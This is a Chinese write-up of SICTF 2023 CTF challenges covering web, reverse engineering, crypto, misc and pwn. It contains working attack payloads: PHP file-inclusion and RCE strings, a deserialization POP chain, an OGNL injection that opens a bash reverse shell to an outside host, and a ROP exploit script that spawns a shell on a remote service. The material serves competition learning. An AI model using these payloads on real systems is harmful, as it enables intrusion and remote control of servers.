WEB

[签到]Include

简单的文件包含，用伪协议读/flag即可得到flag.

?SICTF=php://filter/read=/resource=/flag

Baby_PHP

先是php变量的特性，会将[, +, . 等特殊字符解析成_ 。
绕过preg_match，因为是单行匹配，我们可以用换行绕过(%0a)，
接下来是无参数RCE，参考这个博客。

利用get_defined_vars()，可以成功执行命令。

get: ?k+e[y=123%0a&b=phpinfo();

post: command=eval(end(current(get_defined_vars())));

pain

参考博客：https://xz.aliyun.com/t/10482#toc-7

用jd-gui查看jdk文件的内容。
在pain.class内，可以知道这是Ognl的解析漏洞。
跟进dinner_waf.let_me_see_see方法，可以看到waf。
可以看到，在检测waf前，会对payload进行一次url解码。尝试用unicode编码来绕过，发现可行。

最后用这两条poc中的其中一个来进行反弹shell。

#编码前
(new java.lang.ProcessBuilder(new java.lang.String[]{"bash","-c","bash -i >& /dev/tcp/7654du6216.zicp.fun/33699 0>&1"})).start()
#编码后
/start?payload=(new%20java.lang.%5Cu0050%5Cu0072%5Cu006f%5Cu0063%5Cu0065%5Cu0073%5Cu0073%5Cu0042%5Cu0075%5Cu0069%5Cu006c%5Cu0064%5Cu0065%5Cu0072(new%20java.lang.String%5B%5D%7B%22bash%22%2C%22-c%22%2C%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F7654du6216.zicp.fun%2F33699%200%3E%261%22%7D)).start()

RCE

源码：

<?php
error_reporting(0);
highlight_file(__FILE__);
$code = $_POST['code'];
$code = str_replace("(","hacker",$code);
$code = str_replace(".","hacker",$code);
eval($code);
?>

过滤了(，. ，但发现反引号没被过滤，可以用反引号来rce，查看根目录的flag即可。
payload
post: code=echo `ls /`;

我全都要

源码

<?php
highlight_file(__FILE__);

class B{
    public $pop;
    public $i;
    public $nogame;

    public function __destruct()
    {
        if(preg_match("/233333333/",$this->pop)){
            echo "这是一道签到题，不能让新生一直做不出来遭受打击";
        }
    }

    public function game(){
        echo "扣1送地狱火";
        if ($this->i = "1"){
            echo '<img src=\'R.jpg\'>';
            $this->nogame->love();
        }
    }

    public function __clone(){
        echo "必须执行";
        eval($_POST["cmd"]);
    }
}


class A{
    public $Aec;
    public $girl;
    public $boy;

    public function __toString()
    {
        echo "I also want to fall in love";
        if($this->girl != $this->boy && md5($this->girl) == md5($this->boy)){
            $this->Aec->game();
        }
    }


}


class P{
    public $MyLover;
    public function __call($name, $arguments)
    {
        echo "有对象我会在这打CTF???看我克隆一个对象！";
        if ($name != "game") {
            echo "打游戏去，别想着对象了";
            $this->MyLover = clone new B;
        }
    }


}


if ($_GET["A_B_C"]){
    $poc=$_GET["A_B_C"];
    unserialize($poc);
}

思路：
1. 利用class B 的 __clone来rce。
2. class P 的 __call能实现1。
3. class B的 game能实现2。
4. class A的__toString能实现3。
5. class B 的 __destruct能实现4。
6. 用数组绕过md5。
7. 用preg_match触发__tostring。

pop链：

<?php
class B{
    public $pop;
    public $i="1";
    public $nogame;
}


class A{
    public $Aec;
    public $girl=array(1);
    public $boy=array(2);

}


class P{
    public $MyLover;
}
$a=new B();
$a->pop=new A();
$a->pop->Aec=new B();
$a->pop->Aec->nogame=new p();
echo serialize($a);
//O:1:"B":3:{s:3:"pop";O:1:"A":3:{s:3:"Aec";O:1:"B":3:{s:3:"pop";N;s:1:"i";s:1:"1";s:6:"nogame";O:1:"P":1:{s:7:"MyLover";N;}}s:4:"girl";a:1:{i:0;i:1;}s:3:"boy";a:1:{i:0;i:2;}}s:1:"i";s:1:"1";s:6:"nogame";N;}

查看根目录的flag即可。

get: ?A_B_C=O:1:"B":3:{s:3:"pop";O:1:"A":3:{s:3:"Aec";O:1:"B":3:{s:3:"pop";N;s:1:"i";s:1:"1";s:6:"nogame";O:1:"P":1:{s:7:"MyLover";N;}}s:4:"girl";a:1:{i:0;i:1;}s:3:"boy";a:1:{i:0;i:2;}}s:1:"i";s:1:"1";s:6:"nogame";N;}

post: cmd=system("cat /flag");

你能跟得上我的speed吗

题目要求要快，且每次上传文件后发现文件都被删除了，所以想到了文件上传的条件竞争。
用bp来弄条件竞争，先用bp的爆破无限制地上传文件，再另开一个爆破不断地访问，最后得到flag。

RE

chbase

ida32打开文件，在_main_0函数看到一串类似base64的字符串。
跟进sub_4110F5函数，直到sub_411890，发现这段函数实现了一个base64的编码。
找表。
解码后得到flag。

MyObject

查看main函数，发现一个名为rc4的函数，猜测是rc4加密，且看到key为SIFLAG。
看到这几个变量有值，猜测这是加密后的密文。

网上找一个解rc4的脚本改一下。

# RC4加密和解密
def KSA(key):
    key_length = len(key)
    # 初始化S盒
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % key_length]) % 256
        # 交换S[i]和S[j]
        S[i], S[j] = S[j], S[i]
    return S
def PRGA(S):
    i = 0
    j = 0
    while True:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        # 交换S[i]和S[j]
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % 256]
        yield K
def RC4(key):
    # 加密函数，返回加密后的字节流
    def encrypt(data):
        data_length = len(data)
        keystream = PRGA(KSA(key))
        res = []
        for i in range(data_length):
            res.append(next(keystream) ^ data[i])
        return bytes(res)
    # 解密函数，返回解密后的字节流
    def decrypt(data):
        return encrypt(data)
    return encrypt, decrypt
# 示例：
key = b'SIFLAG'
encrypt_func, decrypt_func = RC4(key)
a=[b'G\xCF"Z\x0E\xD3\'0',b'\xE5\vkG',b'\a\x85\xC3\x99\xBAS\x8D',b'\x9F\x88\xFE\x10w\x1C\x01\a']
print('Decrypted Data:', decrypted_data)
decrypted_data=decrypt_func(a[0][::-1]+a[1][::-1]+a[2][::-1]+a[3][::-1])

print('Decrypted Data:', decrypted_data)

#Decrypted Data: b'SICTF{wow_you_get_the_flag}'

解码的过程中发现，从第三个字符串开始会乱码，去掉第三个字符串的\xE5，后边即可正常解码。

不一样的base64

使用 pyinstxtractor 反编译exe。
用在线网站反编译111.pyc。
base64解码即可得到flag。

[签到]PYC

丢进在线pyc反编译即可。

# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.8

print('SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}')

Crypto

[签到]古典大杂烩

打开文件，是一串emoji表情，base100解码。
丢到赛博厨子里一个一个试，得到flag。

Easy_CopperSmith

RSA的p高位泄露。

源码：

from Crypto.Util.number import *
from flag import flag
p = getPrime(512)
q = getPrime(512)
n = p * q
e = 65537
leak = p >> 230
m = bytes_to_long(flag)
c = pow(m,e,n)
print(n)
print(leak)
print(c)
'''
114007680041157617250208809154392208683967639953423906669116998085115503737001019559692895227927818755160444076128820965038044269092587109196557720941716578025622244634385547194563001079609897387390680250570961313174656874665690193604984942452581886657386063927035039087208310041149977622001887997061312418381
6833525680083767201563383553257365403889275861180069149272377788671845720921410137177
87627846271126693177889082381507430884663777705438987267317070845965070209704910716182088690758208915234427170455157948022843849997441546596567189456637997191173043345521331111329110083529853409188141263211030032553825858341099759209550785745319223409181813931086979471131074015406202979668575990074985441810
'''

先利用在线网站算出p。（在线网站：https://sagecell.sagemath.org/）

最后把p带入常规的rsa解码脚本，即可得到flag。

from Crypto.Util.number import *
import gmpy2
n = 114007680041157617250208809154392208683967639953423906669116998085115503737001019559692895227927818755160444076128820965038044269092587109196557720941716578025622244634385547194563001079609897387390680250570961313174656874665690193604984942452581886657386063927035039087208310041149977622001887997061312418381

c = 87627846271126693177889082381507430884663777705438987267317070845965070209704910716182088690758208915234427170455157948022843849997441546596567189456637997191173043345521331111329110083529853409188141263211030032553825858341099759209550785745319223409181813931086979471131074015406202979668575990074985441810
e = 65537

p=11790815224554410800121104187905468470390194289969616547114051282402254164513760262526048229096923579410713190006883604069013303904509383122210101811900773
q = n//p
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
flag = long_to_bytes(int(m))
print(flag)

#b'SICTF{3f9366ed-b8e4-412f-bbd0-62616a24115c}'

small_e

利用工具一把梭，即可得到flag。

MingTianPao

参考链接：https://blog.csdn.net/m0_63303407/article/details/127193042

直接利用现成的脚本。

import Crypto.Util.strxor as xo
import libnum, codecs, numpy as np

def isChr(x):
    if ord('a') <= x and x <= ord('z'): return True
    if ord('A') <= x and x <= ord('Z'): return True
    return False


def infer(index, pos):
    if msg[index, pos] != 0:
        return
    msg[index, pos] = ord(' ')
    for x in range(len(c)):
        if x != index:
            msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')

def know(index, pos, ch):
    msg[index, pos] = ord(ch)
    for x in range(len(c)):
        if x != index:
            msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(ch)


dat = []

def getSpace():
    for index, x in enumerate(c):
        res = [xo.strxor(x, y) for y in c if x!=y]
        f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))
        cnt = [f(pos) for pos in range(len(x))]
        for pos in range(len(x)):
            dat.append((f(pos), index, pos))

c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]

msg = np.zeros([len(c), len(c[0])], dtype=int)

getSpace()

dat = sorted(dat)[::-1]
for w, index, pos in dat:
    infer(index, pos)

#know(10, 21, 'y')
#know(8, 14, 'n')

print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))
"""
Little Red,Rdin+ Hood ppomi4e
d to obey de mo8her. Thg gr&n
dmother liz ou8 in the"woo#s
, a half hcu fr#m the vklla e
. When Litxl     Re( Riding"Hoo#
entered thi ood? a wolf"cam"
up to her.,Se d%d not klow 0h
nim-l he waq, a)d
id #f him.  Goo#
day to you   itt e Red Rkdin
"""

可以勉强看出这是一个小红帽的故事，开始修复字符，先修复第一行的Little Red Riding Hood。

import Crypto.Util.strxor as xo
import libnum, codecs, numpy as np

def isChr(x):
    if ord('a') <= x and x <= ord('z'): return True
    if ord('A') <= x and x <= ord('Z'): return True
    return False


def infer(index, pos):
    if msg[index, pos] != 0:
        return
    msg[index, pos] = ord(' ')
    for x in range(len(c)):
        if x != index:
            msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')

def know(index, pos, ch):
    msg[index, pos] = ord(ch)
    for x in range(len(c)):
        if x != index:
            msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(ch)


dat = []

def getSpace():
    for index, x in enumerate(c):
        res = [xo.strxor(x, y) for y in c if x!=y]
        f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))
        cnt = [f(pos) for pos in range(len(x))]
        for pos in range(len(x)):
            dat.append((f(pos), index, pos))

c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]

msg = np.zeros([len(c), len(c[0])], dtype=int)

getSpace()

dat = sorted(dat)[::-1]
for w, index, pos in dat:
    infer(index, pos)

know(0, 12, 'i')
know(0, 16, 'g')
know(0, 10, ' ')

print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))
"""
Little Red Riding Hood ppomi4e
d to obey her mother. Thg gr&n
dmother lived out in the"woo#s
, a half hour from the vklla e
. When Little Red Riding"Hoo#
entered the woods a wolf"cam"
up to her. She did not klow 0h
at a wicked animal he waq, a)d
 was not afraid of him.  Goo#
day to you, Little Red Rkdin
"""

接着修复第5行的Little Red Riding Hood，即可得到完整的文章。

import Crypto.Util.strxor as xo
import libnum, codecs, numpy as np

def isChr(x):
    if ord('a') <= x and x <= ord('z'): return True
    if ord('A') <= x and x <= ord('Z'): return True
    return False


def infer(index, pos):
    if msg[index, pos] != 0:
        return
    msg[index, pos] = ord(' ')
    for x in range(len(c)):
        if x != index:
            msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')

def know(index, pos, ch):
    msg[index, pos] = ord(ch)
    for x in range(len(c)):
        if x != index:
            msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(ch)


dat = []

def getSpace():
    for index, x in enumerate(c):
        res = [xo.strxor(x, y) for y in c if x!=y]
        f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))
        cnt = [f(pos) for pos in range(len(x))]
        for pos in range(len(x)):
            dat.append((f(pos), index, pos))

c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]

msg = np.zeros([len(c), len(c[0])], dtype=int)

getSpace()

dat = sorted(dat)[::-1]
for w, index, pos in dat:
    infer(index, pos)

know(0, 12, 'i')
know(0, 16, 'g')
know(0, 10, ' ')
know(4, 24, ' ')
know(4, 28, 'd')

print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))
"""
Little Red Riding Hood promise
d to obey her mother. The gran
dmother lived out in the woods
, a half hour from the village
. When Little Red Riding Hood
entered the woods a wolf came
up to her. She did not know wh
at a wicked animal he was, and
 was not afraid of him. "Good
day to you, Little Red Riding
"""

最后得到flag。

import Crypto.Util.strxor as xo
import libnum, codecs, numpy as np

def isChr(x):
    if ord('a') <= x and x <= ord('z'): return True
    if ord('A') <= x and x <= ord('Z'): return True
    return False


def infer(index, pos):
    if msg[index, pos] != 0:
        return
    msg[index, pos] = ord(' ')
    for x in range(len(c)):
        if x != index:
            msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(' ')

def know(index, pos, ch):
    msg[index, pos] = ord(ch)
    for x in range(len(c)):
        if x != index:
            msg[x][pos] = xo.strxor(c[x], c[index])[pos] ^ ord(ch)


dat = []

def getSpace():
    for index, x in enumerate(c):
        res = [xo.strxor(x, y) for y in c if x!=y]
        f = lambda pos: len(list(filter(isChr, [s[pos] for s in res])))
        cnt = [f(pos) for pos in range(len(x))]
        for pos in range(len(x)):
            dat.append((f(pos), index, pos))

c = [codecs.decode(x.strip().encode(), 'hex') for x in open('Problem.txt', 'r').readlines()]

msg = np.zeros([len(c), len(c[0])], dtype=int)

getSpace()

dat = sorted(dat)[::-1]
for w, index, pos in dat:
    infer(index, pos)

know(0, 12, 'i')
know(0, 16, 'g')
know(0, 10, ' ')
know(4, 24, ' ')
know(4, 28, 'd')

#print('\n'.join([''.join([chr(c) for c in x]) for x in msg]))
key = xo.strxor(c[0], ''.join([chr(c) for c in msg[0]]).encode())
print(key)

#b'SICTF{MTP_AtTack_is_w0nderFu1}'

签到题来咯！

参考链接：https://blog.csdn.net/weixin_55631415/article/details/127994843

需要爆破e，e的范围是512到1024之间。

sage脚本：

#from tqdm import trange
import binascii
from Crypto.Util.number import *
import gmpy2
def attack(c1, c2, e, n):
    PR.<x>=PolynomialRing(Zmod(n))
    g1 = (114*x+2333)^e - c1
    g2 = (514*x+4555)^e - c2

    def gcd(g1, g2):
        while g2:
            g1, g2 = g2, g1 % g2
        return g1.monic()
    return -gcd(g1, g2)[0]
    
    
n = 18993579800590288733556762316465854395650778003397512624355925069287661487515652428099677335464809283955351330659278915073219733930542167360381688856732762552737791137784222098296804826261681852699742456526979985201331982720936091963830799430264680941164508709453794113576607749669278887105809727027129736803614327631979056934906547015919204770702496676692691248702461766117271815398943842909579917102217310779431999448597899109808086655029624478062317317442297276087073653945439820988375066353157221370129064423613949039895822016206336117081475698987326594199181180346821431242733826487765566154350269651592993856883
c1 = 3089900890429368903963127778258893993015616003863275300568951378177309984878857933740319974151823410060583527905656182419531008417050246901514691111335764182779077027419410717272164998075313101695833565450587029584857433998627248705518025411896438130004108810308599666206694770859843696952378804678690327442746359836105117371144846629293505396610982407985241783168161504309420302314102538231774470927864959064261347913286659384383565379900391857812482728653358741387072374314243068833590379370244368317200796927931678203916569721211768082289529948017340699194622234734381555103898784827642197721866114583358940604520
c2 = 6062491672599671503583327431533992487890060173533816222838721749216161789662841049274959778509684968479022417053571624473283543736981267659104310293237792925201009775193492423025040929132360886500863823523629213703533794348606076463773478200331006341206053010168741302440409050344170767489936681627020501853981450212305108039373119567034948781143698613084550376070802084805644270376620484786155554275798939105737707005991882264123315436368611647275530607811665999620394422672764116158492214128572456571553281799359243174598812137554860109807481900330449364878168308833006964726761878461761560543284533578701661413931

#m1=attack(c1,c2,n,2)
#print(long_to_bytes(int(m1)))

for i in range(2**9,2**10):
    if isPrime(i)==False:
        continue
    flag=attack(c1,c2,i,e)
    flag=long_to_bytes(int(flag))
    if b"SICTF{" in flag:
        print(flag)
        break

easy_math

思路是先将hint1和hint2通分然后相减求出q的倍数，之后再和n求最大公约数从而求出q，之后就是正常的rsa解法

from itertools import product
from math import gcd
from Crypto.Util.number import *
import gmpy2

e = 65537
n = 68123067052840097285002963401518347625939222208495512245264898037784706226045178539672509359795737570458454279990340789711761542570505016930986418403583534761200927746744298082254959321108829717070206277856970403191060311901559017372393931121345743640657503994132925993800497309703877076541759570410784984067
hint1 = 564294243979930441832363430202216879765636227726919016842676871868826273613344463155168512928428069316237289920953421495330355385445649203238665802121198919543532254290185502622234014832349396422316629991217252686524462096711723580
hint2 = 484307144682854466149980416084532076579378210225500554261260145338511061452958092407101769145891750844383042274498826787696953308289632616886162073232218214504005935332891893378072083589751354946391146889055039887781077066257013110
c = 57751903193610662622957432730720223801836323458721550133101805763463060486486266309568004721657732742899781400754207249733137375171400440423755473421971160000575072519031824740691618617905549725344323721903857290320737224300672847773455169809689188843070599176261204013341324705808617411345132933937680951713
q=0

for a,b in product(range(2**12,2**13), repeat=2):
    q=gcd(a*hint1-b*hint2,n)
    if q!=1 and q!=n:
        print(q)
        break
        

p = n//q
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
flag = long_to_bytes(int(m))
print(flag)

#8358483529150257619757085065272214074629139403939506404958882156637928949429486966229697771519458532207667137987443291952917150640467328461391364839768437
#b'SICTF{452aebb6-9c16-441a-ac42-fc608bf6063f}'

Radio

参考： CTF中的RSA套路之低加密指数攻击和低解密指数攻击_KogRow的博客-CSDN博客

import gmpy2
import os
from functools import reduce
from Crypto.Util.number import long_to_bytes


def CRT(items):
    N = reduce(lambda x, y: x * y, (i[1] for i in items))
    result = 0
    for a, n in items:
        m = N // n
        d, r, s = gmpy2.gcdext(n, m)
        if d != 1:
            raise Exception("Input not pairwise co-prime")
        result += a * s * m
    return result % N, N
# e, n, c
e = 17
n1 = 14628911682936716611458501697007036859460044243525290515096052103585430459755335375005202100114469571371360084664887335211277585652711111523095037589648375630146039444071400098427638768750755153219974194380355807078158427824557754939604018020265955042573660474772006646525311705184431094905718137297923127124517126579859336516891364853724635334011666814712424599592662398013241607855160919361308195967978220182785816761656927836373944699635667244275310680450562446433724968942835275279255823144471582249379035668825437133182865600026935116686574740844588839352146024513673500770611055698030333734066230166111140083923
n2 = 16756694748293603983474688536179571665757862433174984877308316444468003022266277794769268134195205510197588585566270416339902269736376811449830775290335951504698137924773942880807921752691668522662285163130340474205633998154849689387759453003838730282756734975490180702422176361373516245372635401939755527017589503572550811648345570775428936487145892225736625411540461653083957762795820510109891180906709827194217045059033312564525916136573856999724346161896146703174418039344166251503310869772735585554127509732135494936119159784702673291794381095696332128950979288440758815310482211285712819274848744478643590996499
n3 = 12023158079717019193506148537498877243668782424904061914991928068483879707115315968983829360560644394409575645736275352836086080024994045582242629571839276759393418303915955798990522990081795218822313146157773272844272865701134880180795342597049645358985187689813369428579614193015028249821853347208001645148169449968882591709833452960545988520048722323580338213590245476892223967673180144525106292453573842357322398199104132677638909964034937501684668442732786408572501007756270725934445316827054687741612177409932320532825182104820899546084015733164816993674100635828218335112393003462442685677115798304835391938681
c1 = 786426913645332991929803636719878643130489430090701482974255190570111407517277263761161970232982615374753982050075781017755721714929721429185828101898786972242994012456972241276851428750970754773002966788642795040933520662931514953660571657013642671173456750800960592586345219252277575624120271330470724245201080094330964145796872211627254805407394764183615099525852600855622089361965086460279057625205099471122036599934609091062009161119885692567925924978687256063116915630947838112126347748759078024890458539541208153526564434483654508834147071166870006117573542198238493913144419569943131642262575848786399020602
c2 = 14269311999815379511888097227418748728398011595172649708273598243317106830139061994801598925448165045032084910971094414749744701731066555194159863759072739031915833091715422787808666326235589236328864675164322734119047182014621724868200908222400504845559290620275973427127376594365043386362821355037781568524903149101953873768462097165128186788759111090267131443645126715520994688945363059795513931799317608292977574376954729552861360597103229877031117089231816770880909815561950691603994439997197261395452797893557057320175747162837857668062550646101714062365530246698404923128445182100334335447738834779014705114350
c3 = 3204718091370324153305164801961074660508922478706979436653573192321723216725523523538914956544950802616295043619768261075799875855502834749045520466140056621489305006966280527055668378303630674311102581232313032585389907028715671091914904062961720585667564982641321454541632782484415075257140508738041786400512095949826279576159569786734978545737717138115729502475357594151593143140355121154223614868465202149338507796306863351134218879326031985027900678671697876083351974546516576983143592764763925335805465720148057651958521255276602933604064541840892578409973858867533575728482926007556060584654853884046046420855

n = [n1, n2, n3]
c = [c1, c2, c3]

data = list(zip(c, n))
x, n = CRT(data)
for i in range(17, 18):
    e = i
    m = gmpy2.iroot(gmpy2.mpz(x), e)[0].digits()
    print(long_to_bytes(int(m)))

# b'SICTF{fdc0afb5-1c81-46b9-a28a-241f5f64419d}'

MISC

[签到]Welcome

关注微信公众号并发送”SICTF2023”就可以获得flag辣！

Pixel_art

先是zip伪加密，用winrar修复即可解压出一张图片。
用zsteg查看一下图片，可以看到里面隐写了一张图片。

提取出来。

zsteg Pixel_art.png -e "b1,rgb,lsb,xy" ->out.png

通过在线网站，把文件的rgb信息提取出来，可以得到一些.?!。

..................!?!!.?..................?.?!.?....!.?.......!?!!.?!!!!!!?.?!.?!!!.!!!!!!!!!!!!!.?.........!?!!.?........?.?!.?..!.?.......!?!!.?!!!!!!?.?!.?!!!!!!!!!!!.?...............!?!!.?..............?.?!.?........!.?.................!?!!.?!!!!!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!!!!!...!.......!.!!!!!!!.?.............!?!!.?............?.?!.?........................!.....!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!!!!!!!.....!.!!!!!!!!!!!!!!!!!.?...............!?!!.?..............?.?!.?..............!.!!!!!.?...............!?!!.?!!!!!!!!!!!!!!?.?!.?!!!.................!.?.......!?!!.?!!!!!!?.?!.?!!!!!!!...............!.?.............!?!!.?............?.?!.?......................!.....!.!.?...............!?!!.?!!!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!.?...............!?!!.?..............?.?!.?......!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!.!!!!!!!!!!!!!!!!!!!.............!.!!!!!!!!!!!!!!!!!!!...........!.!.............!.!!!!!!!!!!!!!!!!!...........!.?...............!?!!.?..............?.?!.?!.!!!!!.!!!!!.......!.!!!.?.............!?!!.?!!!!!!!!!!!!?.?!.?!!!!!!!!!!!!!!!!!!!.!.?.................!?!!.?................?.?!.?............!.?.

ook编码，在线网站解码，即可得到flag。

fast_morse

用Audacity打开附件，发现类似morse的东西。

手抄下来，即可得到一串莫斯。

..-. ..--- .- ----- ----. -... ..-. -....- --... ..-. ....- .- -....- ....- ..--- -.... ----. -....- ----. ...-- .- ..... -....- -.-. ---.. .- ....- ---.. ...-- -.... ----- -... ----- ...-- -.-.

morse在线解码后即可得到flag。

baby_zip

参考链接：https://www.cnblogs.com/zysgmzb/p/16834602.html

先把png的头写到一个文件内。

bkcrack攻击。

bkcrack.exe -C flag.zip -c flag.png -p plan.out -o 0

提取出flag.png。

bkcrack.exe -C flag.zip -c flag.png -k 6424c164 7c334afd f99666e5 -d flag.png

最后在png的尾部看到flag。

PWN

[签到]Shop

根据题目描述，nc连上输入几个-1即可拿到flag

Different_gadget

利用read的rdx和rsi残留，ret2write，调用write泄露大量地址，从而获取libc基地址，然后第二次read去getshell即可。完整exp如下：

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

from ckyan.pwn.my_script import *

local = 0
debug = 0

binary = "attachment"

if binary != "":
    elf = ELF(binary)

if local:
    p = process(binary)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
    ip = "210.44.151.51"
    port = "10268"
    p = remote(ip, port)
    lib = "/lib/x86_64-linux-gnu/libc.so.6"

init(lib, binary, p)
context = init_context("tmux", debug)

if lib != "":
    libc = ELF(lib)

if debug and local:
    ggdb()

name     = lambda obj : [name for name in globals() if globals()[name] is obj][0]
set_libc = lambda buf : set_libc_base_and_log(name(buf), buf)
lg       = lambda buf : log_addr(name(buf), buf)

padding = 0x20

rwp_addr = 0x404800

pad1 = b''
pad1 += b'a' * padding
pad1 += p64(rwp_addr)
pad1 += p64(0x4011CE)

# D()

ru(b'Hello!!!')
s(pad1)

r(200)

leak_addr = r7f()
lg(leak_addr)

libc_base = leak_addr - libc.sym['__libc_start_main'] - 128
libc = lg(libc_base)

# ret = gadget("ret")
# pop_rdi_ret = gadget("pop rdi;ret")

ret = libc.address + 0x29cd6
pop_rdi_ret = libc.address + 0x2a3e5

bin_sh_addr = srch("/bin/sh\x00")

pad2 = b''
pad2 += b'a' * padding
pad2 += p64(rwp_addr)
pad2 += p64(ret)
pad2 += p64(pop_rdi_ret)
pad2 += p64(bin_sh_addr)
pad2 += p64(libc.sym['system'])

# D()

s(pad2)

ia()